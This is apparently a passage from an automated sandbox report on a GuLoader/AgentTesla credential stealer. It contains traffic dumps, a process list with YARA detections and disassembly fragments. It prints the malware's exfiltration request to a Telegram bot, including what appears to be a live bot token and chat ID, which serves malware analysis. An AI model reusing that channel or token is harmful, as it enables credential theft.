f9 df 8e e4 a0 93 83 aa b6 3c 95 e5 d5 8c 9a 41 eb b7 57 0c 89 d0 75 66 5a b1 ef 49 6f 66 de f3 39 77 19 92 c7 65 64 c1
                                                                                                                          Data Ascii: N<ZCtj1z}k:|;@!yS6(8n:^KLv+Y"=A~]|E:rR4p3{_?p!p'HfdOm$-wpxG~p<o3TGQHIA0$<<AWufZIof9wed
                                                                                                                          2022-06-14 11:50:17 UTC200INData Raw: 8d dd 92 3c 51 95 ac 88 43 d9 d1 fc 5e fb 1a 60 0e b6 19 d5 83 9b 77 3a 7b d7 46 f3 19 3d 48 b5 64 ab 52 14 fb 8f 91 3d 52 2f f7 34 71 ed 72 02 85 4e 44 ef 71 48 03 78 58 18 1d e5 2f 38 7d a9 9b ec 11 e8 cd 13 f8 f8 9d 21 b4 8e 87 b5 97 0e 84 67 29 1b 94 bd f4 d8 f0 db 44 fd 16 d8 94 1b 8a 6c 8f 46 0e 79 2e aa 50 67 1e e1 85 d7 37 84 7e f3 d5 aa e3 e2 aa 8e 7f f8 09 ef 0d a5 6b 5a 15 a1 86 ff 8e 8e 1d c5 4d 7b 37 f8 0d 06 b9 aa 64 96 51 11 d0 c5 14 bd 04 58 33 b8 e4 e8 ae 9b 7d 2f 7a 26 21 94 98 86 03 44 28 74 d1 47 62 27 65 b6 50 bf 30 1e e3 07 08 35 ba 11 fb 69 b0 63 49 9e 1e 92 0d 16 a1 1b f0 20 64 43 44 5f da 42 f0 52 0b a6 20 39 e8 f6 40 13 08 2b 14 86 66 c9 8f 7d 62 53 aa 5d a1 b7 0a f3 d5 a5 ab 9f f2 25 b2 d7 c4 7b df 6a 40 5b d2 01 43 51 96 e4 04
                                                                                                                          Data Ascii: <QC^`w:{F=HdR=R/4qrNDqHxX/8}!g)DlFy.Pg7~kZM{7dQX3}/z&!D(tGb'eP05icI dCD_BR 9@+f}bS]%{j@[CQ
                                                                                                                          2022-06-14 11:50:17 UTC201INData Raw: 04 a0 c0 e7 49 66 c7 8c 32 6f 20 e9 45 fb 20 b8 d0 54 4d c4 6e a6 87 ac 91 95 d4 8b 98 0c 8d 3b d7 56 93 56 2f 73 08 35 9e e6 3d 96 db 0b ef b8 a6 fd d4 bc 8a bb a0 6f b7 f4 e2 a7 9e 43 e2 b1 5b 63 9d c1 10 72 22 d6 c8 44 30 75 d5 9c 0d 6b 6b a3 d7 00 51 b8 03 9a 8e cd 7c 31 68 e0 b5 10 08 87 14 89 57 e8 81 9d 57 92 a9 8b 05 cc b7 b1 a1 70 56 7c 87 a6 81 f3 a9 ff 7f 77 6e 91 1c 8d b2 fc eb d0 80 cd 02 27 93 62 6b 77 09 f9 6d 53 3a 2f 42 f5 70 b3 52 6e fa b1 96 fa 36 37 45 7a 20 6d 6a 56 ab 00 98 f0 9b 85 b8 7c 8e 43 41 5a ec cf fa 4c 43 e7 eb 75 a8 8f 2f 34 e5 b9 45 63 8f ec 57 85 71 a8 ab b1 ca b0 5c d2 93 31 3d e4 37 bb b6 53 2e 99 74 53 30 1a b7 ed fe 48 2c 34 fb ce 8c 14 fe 22 80 ee e9 2a 2a fa c3 5a c2 b1 ad 1c 1e 4c 1d d1 dc c4 ce 5f 4e 3d 69 b4 e9
                                                                                                                          Data Ascii: If2o E TMn;VV/s5=oC[cr"D0ukkQ|1hWWpV|wn'bkwmS:/BpRn67Ez mjV|CAZLCu/4EcWq\1=7S.tS0H,4"**ZL_N=i
                                                                                                                          2022-06-14 11:50:17 UTC202INData Raw: 25 5a 7a a1 24 07 04 34 c5 30 d7 53 75 94 01 56 54 d0 78 9f 17 ca 67 3a fb 78 a8 48 7a cc 7a 89 64 11 35 25 03 b1 25 99 20 60 c3 54 3a b3 96 3e 6f 6d 58 75 f7 63 db 9e 1b 13 0d ba 2c e4 f2 6e 9b cd ec ea ea 96 7e a5 b7 81 02 99 02 31 5b 80 79 22 50 f7 89 2b 05 ab 0b c7 35 5f b5 f3 78 11 15 9b ed f7 25 44 14 d1 50 c2 13 18 2c 80 ad 15 73 b5 49 47 dc 23 fe 0a 59 a6 08 7e e5 35 df 69 85 b5 9a ba 3b 93 cc 86 75 be c9 da d5 0c 9b e8 be f1 9c a7 24 55 48 25 f5 6e c1 c1 d0 5e ad 2b 44 2d 83 d6 8b 59 46 86 37 8b 0a 0a 4a 67 3c e6 85 53 70 15 a3 4a 4c 20 d8 b2 4d d7 d7 41 d0 ab db 91 3a 81 3c 10 4b 73 93 4c 09 6e 7b 4b 05 93 f4 8d 1a 5c 78 d6 02 3c 25 02 89 47 32 c8 1a f9 4d 67 77 ae 65 2a 89 c6 6d e2 c7 76 7b d1 f8 89 3f a7 e4 2b 1d da c6 f6 53 c2 ec 79 95 5a a0
                                                                                                                          Data Ascii: %Zz$40SuVTxg:xHzzd5%% `T:>omXuc,n~1[y"P+5_x%DP,sIG#Y~5i;u$UH%n^+D-YF7Jg<SpJL MA:<KsLn{K\x<%G2Mgwe*mv{?+SyZ
                                                                                                                          2022-06-14 11:50:17 UTC204INData Raw: f2 4d 86 d7 a7 91 48 ea b8 0f be 0d a2 92 67 66 5a 4f 7a b6 de a6 85 ef b5 57 c5 95 7e ed fd a5 d1 b8 2c f0 68 3c bb d7 72 ee 39 5c ed 1d 20 5b 56 dc 9a ec ae e8 52 25 2c eb fc 33 7d 94 8f 1c e2 5c 91 a7 3f cc c6 c8 69 43 17 66 bf b0 87 b3 22 26 44 09 8a 91 03 de 3b 88 13 42 3c 20 c8 ec 10 4f d9 d4 49 64 f4 81 b8 d5 ad f6 04 c5 eb 1f 40 d8 b3 fc 3c 9e 72 20 42 fb 5e e4 a3 e6 2f cb ff 15 8c ea 22 dd fa 27 94 20 82 9a aa 66 18 9f 9a 3d bf 89 6a ee b8 ba fb c7 b9 f9 55 54 d7 c5 ff 38 3c 79 bd 3b b1 7d 02 68 37 99 bc eb da 11 5e 04 33 fd 8b 7b 5f 3a c1 aa 10 29 f0 45 ea 10 9f 2c 4d 93 42 06 22 8d 60 fd 3f b0 72 3a 20 6d 1a 24 7e f8 16 40 48 38 e7 fb 8e 7e 8c ba 01 37 17 da 5e cc 6b 79 c8 90 53 e3 09 7a 6b 8b c5 8b a8 f0 89 39 83 66 8a f4 70 f0 32 ea 24 65 08
                                                                                                                          Data Ascii: MHgfZOzW~,h<r9\ [VR%,3}\?iCf"&D;B< OId@<r B^/"' f=jUT8<y;}h7^3{_:)E,MB"`?r: m$~@H8~7^kySzk9fp2$e
                                                                                                                          2022-06-14 11:50:17 UTC205INData Raw: a8 82 06 42 78 2c 77 9a db 64 93 36 4d 4e 2e c3 a0 cd b8 5f e8 df bf 5a ec 35 12 25 9f 49 54 9b 50 94 cd ff d6 16 12 67 99 6f 57 64 ca 8c a3 25 05 88 48 2d 59 5b 44 58 66 62 20 d6 ac cc ca 6d e0 ff 76 6b 55 71 99 bf 04 fb 8b 8b b9 c2 82 52 bb f0 0c 95 2b ad 65 8f aa 59 b8 8d 10 98 68 d8 68 e8 a0 e3 6a 6c 83 b8 93 8b e4 69 58 95 e8 39 1f 56 e8 fd 57 1b bf 4e 17 b5 3c 86 06 3b f3 ef 56 24 6e c6 63 94 30 0a ce 38 9e f9 c0 cc 84 87 72 5a a3 6c 0b 56 28 b0 dc 6e 54 59 80 2c 0a 86 e6 5e 2f c5 63 18 e7 4d d2 9b 31 26 ed 10 a6 c3 c6 fd dc a2 8c d2 6e e7 57 a7 42 9b 3c 57 70 7e 21 8c 2e b5 e0 d9 58 8a d2 c4 80 c5 72 62 dd a9 2e 52 6d b3 a4 fb 3b 8e d6 31 0f f5 a8 92 9c 5c d1 88 2f 5c 24 c0 97 49 11 79 8a bc 80 fa d0 81 54 f5 c8 1c 55 0e 3d 70 77 71 86 4c 67 ff 92
                                                                                                                          Data Ascii: Bx,wd6MN._Z5%ITPgoWd%H-Y[DXfb mvkUqR+eYhhjliX9VWN<;V$nc08rZlV(nTY,^/cM1&nWB<Wp~!.Xrb.Rm;1\/\$IyTU=pwqLg
                                                                                                                          2022-06-14 11:50:17 UTC206INData Raw: 7a a7 d6 7d e5 fa 11 4e 96 62 3a 05 9e 5a 3c d4 29 cb 30 79 91 fb 95 7c 3d 4f 9e 48 04 aa 1a 6f e3 2f 25 fd b2 fa 6c 15 31 66 58 8a 4f 59 0a 64 34 87 67 8b b0 14 b4 9b 52 87 cc 6a 29 c9 92 76 eb 04 e7 a0 f6 d8 95 ae fe 98 23 1e af ac f5 79 ef a3 29 22 6d 1a 5b ab 05 83 67 aa c7 bc 53 fb 0c d3 98 ce 97 17 f4 e0 16 9f 7c b2 ed 1e 1e 3e 66 b0 4b 4e f1 6f be bd 25 16 45 84 50 e6 16 df 07 e7 40 df 6f a3 da d2 60 35 42 4c 5c b7 5b 47 01 41 0e 42 45 de e7 e9 6e 22 5c 75 bf 27 14 76 31 c5 2f d0 5d 60 92 1a 4e 47 d1 6e 1e ce c8 63 3e e6 6f dc cc b6 dc f4 43 6f 19 3d 2c 09 a2 23 84 25 73 c0 49 3c bb 98 32 7c 62 51 7f e2 15 ca e5 18 e2 cf c3 2e c4 f2 61 96 55 39 c4 ed b7 6d ce 32 6c 0d 9c 09 26 da 88 7c 36 37 73 39 2e 0b b7 8e 0d 33 57 a6 e3 fe a9 10 94 e1 eb a6 4b
                                                                                                                          Data Ascii: z}Nb:Z<)0y|=OHo/%l1fXOYd4gRj)v#y)"m[gS|>fKNo%EP@o`5BL\[GABEn"\u'v1/]`NGnc>oCo=,#%sI<2|bQ.aU9m2l&|67s9.3WK
                                                                                                                          2022-06-14 11:50:17 UTC207INData Raw: 1b c9 28 9d 0a b7 43 41 8c d7 b0 96 d0 70 e9 26 a9 33 91 29 4a 6f 64 4b 9e af 4a 6e 23 57 80 df c0 87 c9 f5 e3 df d4 bd d2 87 a6 cb fd 21 0d c9 2b 6a fc ba 02 96 7b c4 09 20 38 23 ab 94 47 0f 6e f4 2d 1d 05 42 22 c0 f2 df 99 a1 01 ba e3 f2 7c 81 7d e5 30 92 f5 f9 38 d3 d3 e0 52 b9 c8 c1 58 d0 1f 16 de cc eb 8f d5 fd 29 1a 30 fc 75 f6 e2 0e 39 bf d9 c8 5c 4d fe 1e 37 00 66 9d 09 56 45 53 46 96 1e d5 39 0e 8e c3 ee 91 57 4c 5d 11 4c 1f 15 17 dc 6a ef fe f2 e7 c4 21 dd 3b 3d 42 97 b7 8b 1a 15 9f 97 7d c7 fc 52 42 ab c9 37 30 e0 92 51 d5 16 d2 ed d5 ac de 3c 9f d6 4a 20 ac 4e c5 f5 3d 57 f0 04 3a 54 4c d7 89 fb 32 4c 48 b9 94 fc 75 87 72 e4 95 9a 6f 59 ac a3 3e df c7 d9 6f 48 17 66 a5 bd 94 aa 30 28 2d 06 e3 91 03 d1 b8 dd 36 43 3d 34 c8 e2 1d 49 c3 db 79 64
                                                                                                                          Data Ascii: (CAp&3)JodKJn#W!+j{ 8#Gn-B"|}08RX)0u9\M7fVESF9WL]Lj!;=B}RB70Q<J N=W:TL2LHuroY>oHf0(-6C=4Iyd
                                                                                                                          2022-06-14 11:50:17 UTC209INData Raw: 48 a1 6d 1f 5b c9 76 28 7b b7 cc 59 68 4c 78 84 6f 1f 35 23 18 ad a7 95 23 60 cb 56 33 b7 99 25 73 e6 53 72 eb 1c cb e3 1c 70 9d 06 28 d6 71 67 8b d2 eb df f9 17 b1 dd a1 20 0b 8a 7a 3e 5b 81 6d 22 a5 2e 88 38 8c ad 18 c7 32 44 a9 71 a3 10 04 12 eb ec 35 c2 c9 d2 43 5f 0b 08 5d 92 d9 4e 68 9f 5c 57 5d e2 ed 98 55 aa 1a 6d 77 9d d8 6b 05 bc 8a b8 27 8b da 95 51 ca d2 cf c7 86 7a ea ae 7e 04 af 2c 4c 4b 27 fd 7c c1 ce c2 5e ab 25 d8 ac 9f bf 81 c1 f5 17 f2 32 05 8c 07 62 36 74 9b 0b 67 90 ab 5a cc bb cc 31 09 cb 59 fa 5d e8 c9 e4 35 e6 ad 0f db 5b 9b 46 8c df 7f 59 87 db ff ab 1a 4d fa 95 05 2b 30 80 6e 44 2d 5b 0f 42 4f 41 64 3c 47 68 a7 c0 5f 63 7a 64 76 d3 dd 9e 2c 29 25 aa 99 33 ce 8c 5d b8 fe 7c 99 29 a2 7d 95 2e 84 b8 91 9c 96 66 d7 74 fe 27 72 70 ea
                                                                                                                          Data Ascii: Hm[v({YhLxo5##`V3%sSrp(qg z>[m".82Dq5C_]Nh\W]Umwk'Qz~,LK'|^%2b6tgZ1Y]5[FYM+0nD-[BOAd<Gh_czdv,)%3]|)}.ft'rp
                                                                                                                          2022-06-14 11:50:17 UTC210INData Raw: e7 5f 48 36 11 26 3a 6b 9d 59 d9 01 dd 68 00 a4 d1 b8 91 f8 46 33 a7 4b c5 e8 34 41 e3 1c 3c 54 59 da 9c ec ae 41 52 d1 81 f1 60 99 67 e9 ab 9a 54 4d a3 26 fe c3 d0 49 60 54 19 e8 65 b9 9b 2e 24 34 4a 9b 5e 91 1c d1 b4 d7 0b 41 23 3f ce ec 13 46 c2 c7 5e eb f4 9d 30 34 a6 fd 10 90 e2 1f 4b cd b8 f3 34 98 5c 32 de 65 56 e0 a6 e8 a0 c8 e5 12 8d e6 3b 4e b1 26 9b 3a 98 93 a3 7c 96 4a 9c 0f 3d 8f 62 f9 30 6f ff f5 39 f9 40 5f df cb f0 24 b5 a6 32 34 83 0a 0b 5a b1 58 a1 ff 7a cd 5e 04 33 20 92 49 dc e6 d1 39 48 30 7f 96 f5 9f 70 2e 44 84 c1 1c b0 65 7a 95 2a 30 ed 3c 29 7c 98 b8 58 7f 85 5b 5e 98 3b f8 94 f5 83 ab 92 3f 84 c7 51 5e 36 e5 d3 16 5e e5 07 e7 71 f0 d6 94 b9 e1 0b 08 9d 6c bf e7 fa 1b 21 e3 22 7e 0b d9 93 15 0c 64 a6 e9 b5 71 e0 06 fd 8c dd 05 4b
                                                                                                                          Data Ascii: _H6&:kYhF3K4A<TYAR`gTM&I`Te.$4J^A#?F^04K4\2eV;N&:|J=b0o9@_$24ZXz^3 I9H0p.Dez*0<)|X[^;?Q^6^ql!"~dqK
                                                                                                                          2022-06-14 11:50:17 UTC211INData Raw: ba 44 cd 5f e3 de af c9 13 2e 81 3e 84 5c d1 9a 50 8e d9 71 56 01 80 78 72 07 5a 6b ad 11 3b 02 05 85 53 2e 59 47 4d 47 7c 6b 33 ca 38 bb 44 a2 63 68 76 71 da c5 85 36 b4 f6 a3 96 bc db 8c 5b be ec 09 80 3b 20 b5 86 a0 55 be 8a 15 90 60 c4 65 f1 28 6f 6a 62 90 aa 11 58 f8 7e 22 9e e9 20 87 a7 f7 e9 c9 5b a1 54 05 ad 22 9f 8c b6 f0 e8 45 35 6e c0 70 11 f9 09 fb 2b 1f 3c c5 de f1 87 6d 5a aa 65 1f 46 3a b7 d7 72 c9 8d 94 34 8f 7b e8 20 48 58 8b 17 97 58 ca 86 33 3d a1 14 b4 42 d9 8c d7 b1 8e d9 6a f3 26 b0 32 8e 29 4a 6f 71 4f 96 a8 78 ec da 57 97 da ca 85 d0 ed ee c1 d8 39 da 88 a9 cf f5 3b 80 da 2b 6b f3 ae 17 1e 4f c4 0a e0 31 38 b1 92 54 1c 65 e8 b3 0e 1f dc 0d d5 ea c3 13 50 1c bf ec 7f 7d 80 55 e9 30 92 f5 f2 35 f3 ce e0 4c b4 c2 d6 c5 7e 0c 1d ce c9
                                                                                                                          Data Ascii: D_.>\PqVxrZk;S.YGMG|k38Dchvq6[; U`e(ojbX~" [T"E5np+<mZeF:r4{ HXX3=Bj&2)JoqOxW9;+kO18TeP}U05L~
                                                                                                                          2022-06-14 11:50:17 UTC212INData Raw: 36 cc 25 74 8a 8e 99 79 23 57 93 52 97 6f 18 60 e7 2e 2d ea 20 a5 80 13 20 6b 74 96 4b 51 1d fb fc 9b 71 96 bc 0e b2 97 d7 5e db f6 e1 dc 92 5e f9 60 6a 79 fa c5 92 b1 f5 95 34 82 67 b7 f0 6a f9 24 f0 29 76 1f 47 af 0a 07 78 2e 13 af d1 36 18 86 97 cf 80 8b fc fb 13 83 78 bd 6a d2 0b 24 64 f4 cc b8 fd ea 67 a5 3d 1b 45 9e c2 80 ce ca 1a e7 4d 4d 3e d1 49 5e 0e 2f d0 20 f8 b9 c7 eb 15 5a 16 58 2d c9 7a 08 74 a6 28 68 b0 a2 fa 65 33 d1 b2 39 47 fd 7b 09 56 5f c8 6d eb 17 d8 7e 26 e6 76 d0 50 67 d1 69 9b 7c 13 22 3a 8d 5e 27 8c 31 ed 0c 56 37 b3 94 25 70 e7 be 70 f0 03 4a 22 0b 6c 11 f2 2e dc e5 7d 07 08 e8 d8 6a 9f 79 ce 33 7c 02 8a 8e 3c 55 8f 76 3e 37 73 6d 38 8c 4c 00 d2 b7 a4 b3 ff 70 03 96 7f fe fc 3a 47 06 52 59 c3 06 08 a8 6c b1 11 67 af 47 4d d5 39
                                                                                                                          Data Ascii: 6%ty#WRo`.- ktKQq^^`jy4gj$)vGx.6xj$dg=EMM>I^/ ZX-zt(he39G{V_m~&vPgi|":^'1V7%ppJ"l.}jy3|<Uv>7sm8Lp:GRYlgGM9
                                                                                                                          2022-06-14 11:50:17 UTC214INData Raw: b5 47 93 59 57 16 6c 1b 9e cb 58 9c db 2a 8a b6 c3 ea d4 9e eb cf c5 3c d2 b0 a1 e6 f3 03 8e fa 23 53 fb 97 10 25 5a d6 8a 59 30 17 ac 9d 49 5b 6b 88 ae 74 17 a4 03 af f7 a3 1b 35 1c d3 f1 3f 71 e6 5d 8a 3e f9 e8 fc 3b 99 d3 9f 44 df c5 84 d8 36 02 69 c6 b3 f3 d7 d0 86 2b 60 2d 9a 7d b5 f3 e2 99 dc f9 99 41 1b e3 41 2a 7c 7b c2 14 11 58 19 42 c7 1f b0 21 6a 89 bc f3 f2 55 3b 45 7c 45 37 35 71 c4 1c e1 95 fc e0 cc 23 c5 0e 38 58 9f ab 8e 5f 08 e7 92 12 e7 9e 4a 36 b6 8f 27 47 ea e5 57 ae 14 bd e8 b4 a5 a4 39 f1 f6 3c 3d a9 56 eb e0 3a 5c 81 01 13 5c 50 d2 db fe 5d 49 29 a4 ee f9 14 9a 01 e1 fc 9d 23 58 f7 a6 4a c2 ae c8 0d 41 65 68 d9 b8 e4 af 49 3a 58 1b 9d 8c 6e cc db d9 42 42 78 3c bc e2 7c 48 9a c9 35 6a 84 93 5b 3c ef fe 6e e5 87 02 11 c5 e5 fb 66 9c
                                                                                                                          Data Ascii: GYWlX*<#S%ZY0I[kt5?q]>;D6i+`-}AA*|{XB!jU;E|E75q#8X_J6'GW9<=V:\\P]I)#XJAehI:XnBBx<|H5j[<nf
                                                                                                                          2022-06-14 11:50:17 UTC215INData Raw: 61 11 37 2b 0d bf 26 99 20 6e c5 54 39 bd 98 30 61 67 5f 71 e5 12 c9 eb 09 62 1f cb 29 c4 f0 6f 87 d5 e9 ca eb 97 6c dc b3 a1 03 98 0f 34 5b 81 78 30 25 f3 89 2a 0d a5 0e c0 36 51 bb f1 7e 11 16 93 e3 f9 27 42 14 d3 51 de 03 1a 28 80 ac 14 6f b2 49 45 dd 3f ec 8a d4 a2 0f 7f f7 40 d9 79 84 b4 92 a4 3b 97 c6 87 64 c2 ca da d5 04 9f e8 bf fc 91 a1 24 54 5a a5 68 60 d9 c6 da 50 a3 39 c4 b0 91 a3 99 d9 e7 94 b7 2a 17 0f 42 7a 2e 66 18 4e 75 11 a3 4b 4e 2e de b2 4c c5 57 e8 de ad db 91 27 93 bc 8d 4e 53 93 5e 89 df 7f 4b 04 92 fa 8b 1a 5f 79 d8 0c 3e 22 02 8b 46 3c d9 9a 4c 49 61 65 2e c4 2d a9 c4 7f 62 66 78 79 d4 d8 8b 3e a9 f8 ab 8b b2 c6 82 53 b6 ec 09 95 29 a0 68 87 ae 59 b9 83 1d 9e 68 d9 66 f9 20 67 62 6a 96 aa 13 56 e5 7b 2c 91 ee 2b 9f bb eb fb 4a 1e
                                                                                                                          Data Ascii: a7+& nT90ag_qb)ol4[x0%*6Q~'BQ(oIE?@y;d$TZh`P9*Bz.fNuKN.LW'NS^K_y>"F<LIae.-bfxy>S)hYhf gbjV{,+J


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.11.2049757149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-06-14 11:50:30 UTC215OUTPOST /bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=---------------------------8da4e10a3b4d49e
                                                                                                                          Host: api.telegram.org
                                                                                                                          Content-Length: 990
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-06-14 11:50:30 UTC216INHTTP/1.1 100 Continue
                                                                                                                          2022-06-14 11:50:30 UTC216OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 65 31 30 61 33 62 34 64 34 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 30 30 31 33 31 34 35 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 65 31 30 61 33 62 34 64 34 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 38 34 39 32 32 34 0a 4f 53 46 75 6c
                                                                                                                          Data Ascii: -----------------------------8da4e10a3b4d49eContent-Disposition: form-data; name="chat_id"1700131455-----------------------------8da4e10a3b4d49eContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/849224OSFul
                                                                                                                          2022-06-14 11:50:30 UTC217INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Tue, 14 Jun 2022 11:50:30 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 657
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          {"ok":true,"result":{"message_id":5,"from":{"id":5467326717,"is_bot":true,"first_name":"originlogger00377_bot","username":"originlogger00377_bot"},"chat":{"id":1700131455,"first_name":"Papi","last_name":"Iwuala","username":"Papiloshe7","type":"private"},"date":1655207430,"document":{"file_name":"user-849224 2022-06-14 02-14-18.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAMFYqh2Blc8iApD9e7nVthU419LisgAAh0LAAJGCklR3ESSnEwbmJMkBA","file_unique_id":"AgADHQsAAkYKSVE","file_size":416},"caption":"New PW Recovered!\n\nUser Name: user/849224\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:13:49:37
                                                                                                                          Start date:14/06/2022
                                                                                                                          Path:C:\Users\user\Desktop\TT_COPY.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\TT_COPY.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:406464 bytes
                                                                                                                          MD5 hash:0F7BC1DE08B9154E6EF43BB7B4BAAB22
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low

                                                                                                                          Target ID:6
                                                                                                                          Start time:13:50:04
                                                                                                                          Start date:14/06/2022
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\TT_COPY.exe"
                                                                                                                          Imagebase:0x90000
                                                                                                                          File size:108664 bytes
                                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate

                                                                                                                          Target ID:7
                                                                                                                          Start time:13:50:04
                                                                                                                          Start date:14/06/2022
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\TT_COPY.exe"
                                                                                                                          Imagebase:0x9b0000
                                                                                                                          File size:108664 bytes
                                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.924894081.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate

                                                                                                                          Target ID:9
                                                                                                                          Start time:13:50:04
                                                                                                                          Start date:14/06/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff78c760000
                                                                                                                          File size:875008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:21.6%
                                                                                                                            Signature Coverage:19.7%
                                                                                                                            Total number of Nodes:1998
                                                                                                                            Total number of Limit Nodes:49
                                                                                                                            execution_graph 8544 2b610b6 8545 2b60d7a 8544->8545 8546 2b6133c 8545->8546 8548 2b6f513 8545->8548 8550 2b66043 8548->8550 8549 2b6f5a0 8549->8545 8550->8548 8550->8549 8551 2b6ef1d 10 API calls 8550->8551 8552 2b6edc0 K32EnumDeviceDrivers 8551->8552 8553 2b6ee17 8552->8553 7361 401941 7362 401943 7361->7362 7367 402da6 7362->7367 7368 402db2 7367->7368 7413 40657a 7368->7413 7371 401948 7373 405c49 7371->7373 7455 405f14 7373->7455 7376 405c71 DeleteFileW 7378 401951 7376->7378 7377 405c88 7379 405db3 7377->7379 7469 40653d lstrcpynW 7377->7469 7379->7378 7498 406873 FindFirstFileW 7379->7498 7381 405cae 7382 405cc1 7381->7382 7383 405cb4 lstrcatW 7381->7383 7470 405e58 lstrlenW 7382->7470 7385 405cc7 7383->7385 7387 405cd7 lstrcatW 7385->7387 7388 405ccd 7385->7388 7390 405ce2 lstrlenW FindFirstFileW 7387->7390 7388->7387 7388->7390 7394 405da8 7390->7394 7411 405d04 7390->7411 7391 405dd1 7501 405e0c lstrlenW CharPrevW 7391->7501 7394->7379 7395 405d8b FindNextFileW 7399 405da1 FindClose 7395->7399 7395->7411 7396 405c01 5 API calls 7398 405de3 7396->7398 7400 405de7 7398->7400 7401 405dfd 7398->7401 7399->7394 7400->7378 7404 40559f 24 API calls 7400->7404 7402 40559f 24 API calls 7401->7402 7402->7378 7406 405df4 7404->7406 7405 405c49 60 API calls 7405->7411 7408 4062fd 36 API calls 7406->7408 7407 40559f 24 API calls 7407->7395 7410 405dfb 7408->7410 7410->7378 7411->7395 7411->7405 7411->7407 7474 40653d lstrcpynW 7411->7474 7475 405c01 7411->7475 7483 40559f 7411->7483 7494 4062fd MoveFileExW 7411->7494 7417 406587 7413->7417 7414 4067aa 7415 402dd3 7414->7415 7446 40653d lstrcpynW 7414->7446 7415->7371 7430 4067c4 7415->7430 7417->7414 7418 406778 lstrlenW 7417->7418 7422 40657a 10 API calls 7417->7422 7423 40668f 